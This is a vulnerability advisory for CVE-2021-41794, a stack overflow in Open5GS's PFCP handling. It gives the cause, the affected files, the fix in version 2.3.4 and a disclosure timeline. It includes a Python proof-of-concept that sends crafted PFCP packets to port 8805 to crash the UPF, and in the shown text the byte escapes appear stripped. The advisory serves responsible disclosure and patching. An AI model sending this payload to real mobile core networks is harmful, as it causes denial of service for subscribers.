Vendor: Open5GS Vendor URL: https://github.com/open5gs/open5gs Versions affected: 1.0.0 to 2.3.3 Systems Affected: Linux Author: mark.tedman[at]nccgroup[dot]com Advisory URL / CVE Identifier: CVE-2021-41794 Risk: CVSSv3.1: 8.2 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H)

Summary

When connecting to the UPF port for the PFCP protocol (8805) and sending an Association Setup Request followed by a Session Establishment Request with a PDI Network Instance set to ‘internet’, it causes a stack corruption to occur.

Impact

Exploitation of this vulnerability would lead to denial of service for the subscriber’s equipment.

Details

Sending a PFCP Association Setup followed by a PFCP Session Establishment Request with the settings detailed below is enough to cause the stack overflow.  The issue is caused by the function ogs_fqdn_parse in the file lib/core/ogs-3gpp-types.c calculating a length value used in a memcpy without validating it.

Directly affected files:

• Function: ogs_fqdn_parse in /lib/core/ogs-3gpp-types.c
• /lib/nas/5gs/ies.c
• /lib/nas/eps/ies.c
• /lib/pfcp/handler.c
• /lib/pfcp/types.c
• /lib/sbi/nnrf-handler.c
• /src/mme/sgsap-handler.c
• /src/sgwc/s11-handler.c
• /src/smf/context.c

The following python script can be used to replicate the issue:

#!/usr/bin/env python3  import socket  sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(1.0)  pfcp_association_setup_req = b'x20x05x00x1ax00x00x01x00x00x3cx00x05x00xc0xa8x3fx88x00x60x00x04x5fxf4x38x25x00x59x00x01x00'  pfcp_session_establishment_req = b'x21x32x00xefx00x00x00x00x00x00x00x00x00x00x02x00x00x3cx00x05x00xc0xa8x3fx88x00x39x00x0dx5ax00x00x00x00x00x00x00x01xc0xa8x3fx88x00x01x00x46x00x38x00x02x00x01x00x1dx00x04x1fx00x00x00x00x02x00x27x00x14x00x01x00x00x15x00x09x01x00x00x00x0axc0xa8x3fx88x00x16x00x08x69x6ex74x65x72x6ex65x74x00x5dx00x05x02x2dx2dx00x02x00x5fx00x01x00x00x6cx00x04x00x00x00x01x00x01x00x34x00x38x00x02x00x02x00x1dx00x04x1fx00x00x00x00x02x00x1ax00x14x00x01x01x00x16x00x08x69x6ex74x65x72x6ex65x74x00x5dx00x05x06x2dx2dx00x02x00x6cx00x04x00x00x00x02x00x03x00x16x00x6cx00x04x00x00x00x01x00x2cx00x01x02x00x04x00x05x00x2ax00x01x01x00x03x00x24x00x6cx00x04x00x00x00x02x00x2cx00x01x02x00x04x00x13x00x2ax00x01x00x00x54x00x0ax01x00x00x00x00x0axc0xa8x3fx88x00x71x00x01x01'  sock.sendto(pfcp_association_setup_req, ('127.0.0.7', 8805)) try:    sock.recv(65535) except Exception as ex:    print(f"Receive failed: {ex}")  sock.sendto(pfcp_session_establishment_req, ('127.0.0.7', 8805)) try:    sock.recv(65535) except Exception as ex:    print(f"Receive failed: {ex}")  sock.close() 

Recommendation

The function ogs_fqdn_parse needs to correctly calculate/validate the length used in the memcpy function.  This has been patched as of October 6^th 2021 (fix committed to main branch of Open5GS and released in version 2.3.4).

Users should update to the most recent version 2.3.4 or above of Open5GS.

Vendor Communication

29/09/2021: Initial email sent to Open5GS 29/09/2021: Open5GS replied with PGP Key 30/09/2021: Sent Technical Advisory to Open5GS 30/09/2021: Technical Advisory received by Open5GS 01/10/2021: Bug fixed by Open5GS 06/10/2021: Open5GS version 2.3.4 released - fixes bug

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  06/10/2021

Written by:  Mark Tedman